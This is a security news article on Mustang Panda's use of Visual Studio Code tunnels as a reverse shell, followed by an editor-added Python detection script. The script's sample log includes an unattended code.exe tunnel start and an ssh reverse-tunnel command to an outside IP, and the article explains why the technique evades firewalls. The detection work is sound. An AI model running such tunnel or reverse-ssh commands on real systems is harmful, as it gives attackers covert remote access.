
Hackers Target Visual Studio Code in Southeast Asian Attacks


A China-affiliated advanced persistent threat (APT) group, Mustang Panda, has been identified abusing a legitimate feature of Visual Studio Code in espionage campaigns aimed at government organizations in Southeast Asia.

“Mustang Panda leveraged Visual Studio Code’s embedded reverse shell to infiltrate target networks,” stated Tom Fakterman, a researcher at Palo Alto Networks Unit 42. He labeled it a “relatively new technique” first demonstrated by Truvis Thornton in September 2023.

This operation is believed to extend an earlier campaign against an unnamed Southeast Asian government in late September 2023.

Active since 2012, Mustang Panda, also tracked as BASIN, Bronze President, RedDelta and Stately Taurus (Unit 42's name for the group), frequently conducts espionage against government and religious institutions across Europe and Asia, particularly in South China Sea nations.

The recent campaign stands out for its use of Visual Studio Code's remote tunnel feature as a reverse shell to execute arbitrary code and deploy additional payloads.

“Attackers can exploit either the portable version of code.exe (Visual Studio Code’s executable) or an existing installation,” Fakterman explained. “By running the code.exe tunnel command, attackers obtain a link that requires logging into GitHub with their own account.”


After this step, the attacker gains access to a Visual Studio Code web environment (the vscode.dev interface) linked to the compromised machine, from which they can run commands in an integrated terminal and create or edit files on the host. Because the tunnel is established over an outbound HTTPS connection to Microsoft's tunnel service, the traffic blends in with legitimate developer activity and no inbound firewall rule is needed.
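One way to hunt for this technique in endpoint telemetry, as an added example that is not code from Unit 42, Microsoft or the original article: the script below scans Sysmon-style process-creation, network-connection and DNS records (constructed sample lines, flattened into key=value pairs) for a tunnel being started from code.exe, for connections to the tunnel service, and for OpenSSH spawned by a host that already started a tunnel. The standalone CLI name `code-tunnel.exe` and the domains `*.devtunnels.ms`, `*.tunnels.api.visualstudio.com` and `vscode.dev` are the editor's assumptions about current VS Code builds; verify them against your own installs and telemetry before deploying.

```python
"""Hunt for abuse of the Visual Studio Code tunnel feature in endpoint logs.

Example added by the editor; not code from Unit 42, Microsoft or the article.
Assumptions made for illustration:
  * the log lines are constructed, Sysmon-style records (EventID 1 = process
    creation, 3 = network connection, 22 = DNS query) as key=value pairs;
  * `code-tunnel.exe` is the standalone VS Code CLI shipped next to code.exe,
    and `*.devtunnels.ms` / `*.tunnels.api.visualstudio.com` / `vscode.dev`
    are the tunnel-service endpoints (verify before deploying).
"""
import re
from dataclasses import dataclass

# Binaries that can start a tunnel from the host (editor's assumption).
TUNNEL_IMAGES = {"code.exe", "code-tunnel.exe"}

# Tunnel-service domains (editor's assumption). github.com is deliberately
# absent: the device-login step uses it, but it is far too common to alert on.
TUNNEL_DOMAIN_SUFFIXES = (".devtunnels.ms", ".tunnels.api.visualstudio.com")
TUNNEL_DOMAINS = {"vscode.dev"}

# Passing this flag is how a script (or an attacker) skips the interactive
# licence prompt, so its presence suggests an unattended start.
UNATTENDED_FLAG = "--accept-server-license-terms"

_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Finding:
    line_no: int
    rule: str
    detail: str


def parse_fields(line):
    """Turn 'Key=value Key2="quoted value"' into a dict (quotes stripped)."""
    return {k: v.strip('"') for k, v in _FIELD.findall(line)}


def image_basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_tunnel_command(cmdline, image):
    """True when the command line starts a tunnel rather than the editor UI."""
    if image == "code-tunnel.exe":
        return True
    args = cmdline.lower().split()
    return "tunnel" in args[1:]  # skip argv[0], which is the binary path


def is_tunnel_domain(host):
    host = host.lower().rstrip(".")
    return host in TUNNEL_DOMAINS or host.endswith(TUNNEL_DOMAIN_SUFFIXES)


def hunt(log_text):
    """Scan newline-separated records and return the suspicious ones."""
    findings = []
    tunnel_hosts = set()  # image paths already seen starting a tunnel
    records = [l.strip() for l in log_text.splitlines() if l.strip()]
    for n, line in enumerate(records, 1):
        f = parse_fields(line)
        image = f.get("Image", "")
        base = image_basename(image)
        if f.get("EventID") == "1":
            cmd = f.get("CommandLine", "")
            if base in TUNNEL_IMAGES and is_tunnel_command(cmd, base):
                tunnel_hosts.add(image.lower())
                mode = "unattended" if UNATTENDED_FLAG in cmd else "interactive"
                findings.append(Finding(n, "vscode-tunnel-start",
                                        f"{base} started a tunnel ({mode}): {cmd}"))
            elif base == "ssh.exe" and f.get("ParentImage", "").lower() in tunnel_hosts:
                # Unit 42 saw OpenSSH used for commands and lateral movement;
                # ssh spawned by a known tunnel host is a lead, not a verdict.
                findings.append(Finding(n, "ssh-from-tunnel-host", cmd))
        elif f.get("EventID") in ("3", "22"):
            host = f.get("QueryName") or f.get("DestinationHostname") or ""
            if is_tunnel_domain(host):
                findings.append(Finding(n, "vscode-tunnel-infra", f"{base} -> {host}"))
    return findings


# Constructed sample telemetry: one benign editor start, one tunnel start from
# a portable copy in a public folder, its DNS/network activity, and ssh.exe
# spawned by that same binary.
SAMPLE_LOG = r'''
EventID=1 Image="C:\Program Files\Microsoft VS Code\Code.exe" CommandLine="C:\Program Files\Microsoft VS Code\Code.exe --new-window" ParentImage=C:\Windows\explorer.exe
EventID=1 Image=C:\Users\Public\vsc\code.exe CommandLine="C:\Users\Public\vsc\code.exe tunnel --accept-server-license-terms --name srv01" ParentImage=C:\Windows\System32\cmd.exe
EventID=22 Image=C:\Users\Public\vsc\code.exe QueryName=global.rel.tunnels.api.visualstudio.com
EventID=3 Image=C:\Users\Public\vsc\code.exe DestinationHostname=euw-1.rel.tunnels.api.visualstudio.com DestinationPort=443
EventID=22 Image=C:\Windows\System32\svchost.exe QueryName=update.microsoft.com
EventID=1 Image=C:\Windows\System32\ssh.exe CommandLine="C:\Windows\System32\ssh.exe -R 2222:localhost:22 ops@203.0.113.5" ParentImage=C:\Users\Public\vsc\code.exe
'''

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"line {f.line_no:>2}  {f.rule:<22} {f.detail}")
```

On the sample data the benign editor launch and the svchost DNS lookup produce nothing, while the portable code.exe is flagged for an unattended tunnel start, for both contacts with the tunnel service, and again when it spawns ssh.exe. In production, the tunnel-start rule is the high-confidence one; the domain rule will also fire for developers who use tunnels legitimately, so pair it with the process context (user, parent, path outside Program Files) before escalating.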

Notably, the malicious use of this method was first flagged by Norwegian cybersecurity firm mnemonic in connection with the exploitation of a zero-day vulnerability in Check Point's Network Security gateway products (CVE-2024-24919, CVSS score: 8.6), which has since been patched.

According to Unit 42, Mustang Panda used this approach to deploy malware, conduct reconnaissance, and exfiltrate sensitive data. The threat actor also leveraged OpenSSH to run commands, transfer files, and move laterally within the network.

Further analysis uncovered a secondary cluster of activity “occurring simultaneously and sometimes on the same endpoints,” which involved ShadowPad malware—a modular backdoor commonly used by Chinese espionage groups.

It remains uncertain whether these two intrusion clusters are connected or if different groups are “piggybacking on each other’s access.”

“Based on forensic analysis and the timeline, it’s plausible these clusters originated from the same threat actor (Stately Taurus),” said Fakterman. “However, other explanations, such as a collaborative effort between two Chinese APT groups, cannot be ruled out.”

Source: TheHackerNews
